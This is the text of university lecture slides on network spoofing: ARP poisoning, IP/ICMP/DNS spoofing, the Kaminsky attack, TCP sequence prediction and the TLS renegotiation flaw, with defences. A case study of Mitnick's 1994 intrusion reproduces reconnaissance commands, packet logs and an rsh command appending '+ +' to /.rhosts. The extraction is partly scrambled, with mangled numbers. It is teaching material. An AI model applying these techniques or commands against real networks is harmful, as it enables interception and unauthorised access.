This action might not be possible to undo. Are you sure you want to continue?
CA645 Gavin O’ Gorman Spooﬁng
On a hub LAN, packet sniﬃng is trivial as packets are broadcasted to all stations. The network card is put into promiscuous mode A packet sniﬀer is then used for example, wireshark or tcpdump. Anything transmitted in plaintext is trivial to observe Complete objects can be extracted from observed streams including images, executables, anything transmitted over the network.
Output of connection wget request to google.com
CA645 Gavin O’ Gorman Spooﬁng
But we might want to see the actual payload. Use the man page to ﬁnd out tcpdump options.
CA645 Gavin O’ Gorman Spooﬁng
Analysing a packet dump with tcpdump can be diﬃcult. If possible, use wireshark, formerly ethereal.
CA645 Gavin O’ Gorman Spooﬁng
Switched Networks CA645 Gavin O’ Gorman Spooﬁng Switched networks do not send all traﬃc to all ports. or just some traﬃc on a switched network. . Send the wrong data to other hosts on the network. so sniﬃng is not possible. it is possible to sniﬀ all. Or is it? By exploiting the Address Resolution Protocol. ARP Caches can be poisoned.
The machines have MAC addresses of A. 2 and 3. B and C are innocent parties. A wishes to see the communications between A and B. B and C and IP addresses of 1. CA645 Gavin O’ Gorman Spooﬁng . A is the attacker.ARP Poisoning We have a LAN with three machines connected via a switch.
This ARP REQUEST is broadcasted to the network. as the source address A with a false associated IP of 2. CA645 Gavin O’ Gorman Spooﬁng .ARP Poisoning A will create an Ethernet frame containing an ARP REQUEST for IP address 3. The ARP REQUEST will contain.
At the same time. C updates its ARP cache with the source IP and MAC in the spoofed packet. CA645 Gavin O’ Gorman Spooﬁng . C’s cache now contains 2:A.ARP Poisoning C sees the ARP REQUEST and responds with its Ethernet address.
.ARP Poisoning CA645 Gavin O’ Gorman Spooﬁng A performs the same trick. this time sending the ARP REQUEST to B and using A:3 as the source MAC and IP.
ARP Poisoning B see the ARP REQUEST. replies and updates its cache with the false information. CA645 Gavin O’ Gorman Spooﬁng . B has a cache where IP address 3 points to MAC address A and C has a cache with IP address 2 pointing to MAC address A. A has a cache with the correct mappings.
delay or delete. so sends the Ethernet frame encapsulating the IP packet to A. Any response from C is also sent to A. B sees 3:A in its cache. A can then choose to send the packet onto C having observed the contents. CA645 Gavin O’ Gorman Spooﬁng .ARP Poisoning B now wishes to connect to IP address 3. modify the contents.
Send a false. transmitting to all nodes .The brute force approach to sniﬃng traﬃc on a switch. Overload a switch . non-existant MAC address for the local IP gateway to a target machine on the network.Other ARP Related attacks CA645 Gavin O’ Gorman Spooﬁng Denial of Service . the frames will be sent to nowhere. The switch memory will ﬁll up and may drop down into basic hub mode. When this machine attempts to connect to IP addresses not on the LAN. The machine will have lost external access. Send an excess of ARP updates to the switch.
POP3 etc. Attacker inserts malicious code into HTTP downloads and so installs a virus on the secure machine. HTTP. All connections from the secure machine are now routed via the in-secure. CA645 Gavin O’ Gorman Spooﬁng . is still a serious issue Wireless networks are a major victim Viruses and trojans can utlise ARP poisoning/spooﬁng on LANs Assume you have a secure workstation on a LAN Another machine on the LAN is not so secure and ends up with a virus on it The compromised machine performs ARP poisoning implementing a Man in the Middle attack. SMTP. although quite old.This is not an out of date attack ARP poisoning.
ARPWatch builds a database of MAC:IP mappings and notiﬁes when there are changes. If you have a managed switch. .Prevention/Monitoring CA645 Gavin O’ Gorman Spooﬁng How to prevent ARP Spooﬁng/Poisoning? On a small network. Not too feasible for a large number of machines though. MAC addresses can be changed easily. you may be able to restrict each port to a single MAC address You can monitor for suspicious ARP activity using ARPWatch. Authorization solely based on MAC address is a BAD idea. you could setup static IP:ARP mappings and disable updates.
. root only under unix. TCP has sequence numbers which hinder the attack. Programmed using RAW Sockets. IP spooﬁng attacks are particularly dangerous when hosts use an IP address as authentication. but as we will see are not infallible. discussed later CA645 Gavin O’ Gorman Spooﬁng .IP Spooﬁng IP packets can be created manually and contain whatever their designer wishes. Older unix utilities. Replace by SSH. IP source address can be set to anything. rlogin allowed access based on the source IP address. rsh.. IP spooﬁng attacks will work with ICMP and UDP.
overloading it. CA645 Gavin O’ Gorman Spooﬁng . A basic attack may be to send a stream of ping packets to a host in an attempt to waste bandwidth or processing time. potentially overwhelming the victim. with the source of the ping set to the victim. Any machine on the network conﬁgured to respond to ICMP broadcast pings will reply. This is limited to the bandwidth the attacker has available to them. A more eﬀective attack is to broadcast a ping to the entire network. There are ICMP implementation of this attacks.IP Spooﬁng Basic ICMP attacks can be implemented using spooﬁng. The attacker can spoof the source IP address so as to not be identiﬁed. A smurf attack is a Denial of Service attack where a false request will generate a storm of responses to a target address.
ICMP Spooﬁng: Ping attack Attacker sends a single ping. packet to the broadcast address with the source as the victims address CA645 Gavin O’ Gorman Spooﬁng . ICMP ECHO request.
CA645 Gavin O’ Gorman Spooﬁng .ICMP Spooﬁng: Ping attack The machines on the network respond with ICMP ECHO responses to the victim.
ICMP Spooﬁng: Redirect attack CA645 Gavin O’ Gorman Spooﬁng The ICMP Redirect message is used to by gateways to advise of a better route. a client must have made a request for the Redirect to be sent. A Redirect message must be sent in relation to an existing connection however. . That is.
a primary and secondary.ICMP Spooﬁng: Redirect attack Below we have two gateways. The secondary gateway has been compromised by an attacker. The target machine allows the trusted host to connect to it. There is a target machine the attacker wishes to access and a trusted host. CA645 Gavin O’ Gorman Spooﬁng .
ICMP Spooﬁng: Redirect attack CA645 Gavin O’ Gorman Spooﬁng The attacker sends a spoofed TCP SYN packet to the target machine. The spoofed source is the trusted host. .
.ICMP Spooﬁng: Redirect attack CA645 Gavin O’ Gorman Spooﬁng Target machine responds with the SYN/ACK packet. routed through the primary gateway.
The target machine updates its routing table to reﬂect this. The source is set as being the primary gateway and the Redirect message tells the target to use the secondary gateway in future. CA645 Gavin O’ Gorman Spooﬁng .ICMP Spooﬁng: Redirect attack The attacker now sends an ICMP Redirect packet to the target machine.
ICMP Spooﬁng CA645 Gavin O’ Gorman Spooﬁng ICMP attacks can also be used for additional Denial of Service attacks with the Destination Unreachable or Time Exceeded messages. It is also the case that for LAN attacks. However. ARP poisoning can achieve the same results with less eﬀort. RFC 1122 advises that most ICMP error messages by treated as advisory rather than mandatory. practically ICMP attacks are not very common. .
Request has a 216 bit random ID number. CA645 Gavin O’ Gorman Spooﬁng . The response from the server contains the same ID number as identiﬁcation. DNS requests and responses less than 512bytes use UDP. DNS is one example. Outgoing packet has a UDP source port.UDP Spooﬁng Applications using UDP may also be vulnerable to IP spooﬁng.
Solution is when the ISP DNS server issues a request to the authoritative server. CA645 Gavin O’ Gorman Spooﬁng .bbc. spoof a response from that server with the attackers chosen IP.UDP Spooﬁng: DNS An attacker wants to replace the IP for www.co.uk with that of a machine they control.
To discover the ID. so does not know the ID. The attacker cannot see the request. CA645 Gavin O’ Gorman Spooﬁng . The solution for the attacker is to: Issue the request for the domain him/herself. To discover the source port. it actually evaluates to a . the attacker uses a brute force approach of sending a large number of false responses with diﬀerent IDs. issue some requests for domains the attacker controls. The server may use the same port consistently.UDP Spooﬁng: DNS It’s not quite that straightforward however when the attacker is not on the same LAN. With the Birthday Paradox.96 chance with 650 request/responses. or the source UDP port or even the time the request is issued. thus see what source port the server uses.
not just a single record. brute forcing the ID 3. 4. NS ! CA645 Gavin O’ Gorman Spooﬁng . The attack is almost identical however. instead of responding with the DNS record. 2. However. it allows an attacker to take over a complete domain. The attacker controls this nameserver and so now responds to requests for the compromised domain. MX. The attacker makes a request for a random/unused subdomain in the particular domain he wishes to control.Kaminsky Attack Dan Kaminsky found a more dangerous version of this attack. The attacker then sends the forged response packets as in the previous attack. the attacker sends a message delegating the response to another nameserver. 1.
How to solve ? Randomise the UDP source port as well Potentially other solutions like DNSSec. this attack can succeed in approximately 10 seconds.Kaminsky Attack CA645 Gavin O’ Gorman Spooﬁng With a suﬃcent amount of data. .
but they often do. Unicast Reverse Path Forwarding . More of this in Distributed Denial of Service attacks. .Preventing IP Spooﬁng CA645 Gavin O’ Gorman Spooﬁng One of the most important issues is to not accept packets claiming to be from inside your network.Don’t route non-existant IPs and ensure that packets entering the router have a valid path to that router. which originiate from outside the network ISPs should not route packets with addresses not on their network.
TCP/IP implementations diﬀer in how they generate the ISNs. However. that of the sequence numbers.TCP Stream spooﬁng CA645 Gavin O’ Gorman Spooﬁng Moving up to TCP. Some implementations can be predictable! . negotiated during the TCP/IP handshake. These sequence numbers make it diﬃcult for an attacker to spoof a TCP/IP stream they cannot observe them. a new factor is introduced.
Case Study! An interesting case study detailed at http://www. x-terminal is conﬁgured to allow connections from server. That is. CA645 Gavin O’ Gorman Spooﬁng . Shimomura’s network consists of three machines server x-terminal target The x-terminal computer trusts the server machine.html Two o clock in the afternoon. Mitnick used TCP/IP spooﬁng to access the network.com/ra/hack/tsattack. Kevin Mitnick breaks into Tsutomu Shimomura’s network.gulker. Christmas Day. Mitnick spent 5 years in jail. Shimomura is displeased and helps the FBI to track down and ultimately arrest Mitnick. 1994. He left mocking voicemails for Shimomura’s.
His machine is toad.com# finger -l @target finger -l @server finger -l root@server finger -l @x-terminal showmount -e x-terminal rpcinfo -p x-terminal finger -l root@x-terminal .com. server and x-terminal machines.com# toad.com# toad.com# toad.com# toad. He is listing through information oﬀered by the target. 14:09:32 14:10:21 14:10:50 14:11:07 14:11:38 14:11:49 14:12:05 toad.com# toad.com# toad.Case Study CA645 Gavin O’ Gorman Spooﬁng Mitnick begins with a reconnaisance of the network.
login: server.6.97.login: server.login: server.601 130.login: server.607 130.830111 14:18:22.97.login: server.943514 14:18:23.605 130.6.603 130.92.login: server.604 130.92.97.Case Study CA645 Gavin O’ Gorman Spooﬁng Several minutes later.6. The connection queue is ﬁlled and the server machine is unable to respond to any requests.184.108.40.2066069 14:18:22.744477 14:18:22. the server machine is bombarded with SYN packets from a non-existant IP address.606 130.92.886128 14:18:220.127.116.112 130.97.600 130.92.97.login: server.login: server.002715 14:18:18.104.22.168.162781 130.516699 14:18:22.92.97.login: S S S S S S S S S 1382726960:1382726960(0) 1382726961:1382726961(0) 1382726962:1382726962(0) 1382726963:1382726963(0) 1382726964:1382726964(0) 1382726965:1382726965(0) 1382726966:1382726966(0) 1382726967:1382726967(0) 1382726968:1382726968(0) win win win win win win win win win 4096 4096 4096 4096 4096 4096 4096 4096 4096 .6.608 > > > > > > > > > server.97. 14:18:22.214.171.124.103275 14:18:23.
shell > apollo.shell: R 1382726993:1382726993(0) win 0 apollo.775395 14:18:27.714932 14:18:27.994: S 2022592000:2022592000(0) ack 1382726997 CA645 Gavin O’ Gorman Spooﬁng .998 > x-terminal.251840 14:18:27.shell: S 1382726990:1382726990(0) win 4096 x-terminal.906002 14:18:26.it.734953 14:18:28.shell > apollo.996: S 2022336000:2022336000(0) ack 1382726995 apollo.998: S 2022080000:2022080000(0) ack 1382726993 apollo.794456 14:18:28.999 > x-terminal.224935 14:18:28.luc.shell: R 1382726995:1382726995(0) win 0 apollo.edu to x-terminal 14:18:25.1000 > x-terminal.shell: S 1382726996:1382726996(0) win 4096 x-terminal.shell: S 1382726993:1382726993(0) win 4096 x-terminal.014050 14:18:27.996 > x-terminal.shell > apollo.shell > apollo.shell: R 1382726992:1382726992(0) win 0 apollo.shell > apollo.shell: R 1382726996:1382726996(0) win 0 apollo.999 > x-terminal.811591 14:18:29.172394 14:18:26.shell: R 1382726992:1382726992(0) win 0 apollo.995: S 2022464000:2022464000(0) ack 1382726996 apollo.094731 14:18:26.997 > x-terminal.shell: S 1382726995:1382726995(0) win 4096 x-terminal.shell: S 1382726991:1382726991(0) win 4096 x-terminal.274572 apollo.995 > x-terminal.174846 14:18:27.shell: S 1382726992:1382726992(0) win 4096 x-terminal.997 > x-terminal.998 > x-terminal.996 > x-terminal.shell: R 1382726994:1382726994(0) win 0 apollo.054114 14:18:28.shell: S 1382726994:1382726994(0) win 4096 x-terminal.305578 14:18:28.999 > x-terminal.775037 14:18:26.694691 14:18:26.997: S 2022208000:2022208000(0) ack 1382726994 apollo.995 > x-terminal.shell > apollo.shell: R 1382726991:1382726991(0) win 0 apollo.shell > apollo.564333 14:18:28.1000 > x-terminal.544069 14:18:27.994 > x-terminal.074990 14:18:29.Case Study 20 connections are made from apollo.507560 14:18:26.999: S 2021952000:2021952000(0) ack 1382726992 apollo.1000: S 2021824000:2021824000(0) ack 1382726991 apollo.
Case Study If we look at the Initial Sequence Numbers being sent from x-terminal. we see something interesting CA645 Gavin O’ Gorman Spooﬁng .
from server x-terminal responds with a SYN. A spoofed SYN packet is sent to x-terminal.Case Study Now that the ISN sequence is know. A spoofed data packet is then sent to x-terminal. A spoofed ACK packet is then sent to x-terminal. A connection has been opened.rhosts" CA645 Gavin O’ Gorman Spooﬁng . it is possible for Mitnick to actually establish a fake connection to the x-terminal machine from the server machine. ACK packet to server But remember! Server was overloaded at the start. so is unable to respond with a RST packet. with the guessed ISN. The contents of it are 14:18:37 server# rsh x-terminal "echo + + >>/.
RST packets are sent to the server machine to clear the backlog and allow it to function normally The spoofed connection is closed. there is no need for more stream spooﬁng. as any user. . An existing connection from the x-terminal machine to the target machine is hijacked and Mitnick has achieved his goal.Case Study CA645 Gavin O’ Gorman Spooﬁng Mitnick can now connect to the x-terminal machine from any other machine.
at the time.That was 1994 ! CA645 Gavin O’ Gorman Spooﬁng That was a long time ago. Or have they? CERT advisory CA-2001-09 demonstrates that Alcatel equipment. . In 2004. Vendors have improved their TCP/IP stacks to use properly random ISNs. Window sizes are 32k or more.000 every milisecond. but increased the ISN by 64. if the sequence number was anywhere within the recieve window. Watson discovered that RST packets were honoured. so less than 217 guesses to generate a correct packet. didn’t use random ISNs.
SSL/TLS Re-negotiation ﬂaw An interesting ﬂaw was discovered in the TLS protocol recently. the server takes the initial piece of data from the attacker and preﬁxes it to the data sent by the client. The server and client establish a secure. However. sending on the original client parameters. The innocent user attempts to connect to a target server. thus recieving the initial handshake values from the client. conﬁdential connection which the attacker cannot compromise. around November of 2009. CA645 Gavin O’ Gorman Spooﬁng . The attacke has put himself or herself inbetween the client and the server. The attacker then makes its own connection to the TLS server. As part of the re-negotiation protocol. It sends a small amount of data and then requests a re-negotiation. The ﬂaw allows a MITM attacker to prepend a conversation with a small amount of data. secured by TLS.
cookies for examples. the initial Get header Further data.xml” Attacker a status update msg to twitter with the attacker username/pwd When the client submits a status update.com/statuses/update. proof of concept implementation of this attack was used to compromise Twitter accounts. are included. CA645 Gavin O’ Gorman Spooﬁng .SSL/TLS Re-negotiation ﬂaw A practical. For Twitter. it includes the username/password. an update can be done through a simple HTTP PUT “twitter. The attacker sends GET or PUT request with no CRLF. The clients header is then partially ignored. The full HTTP header is written to the attackers status.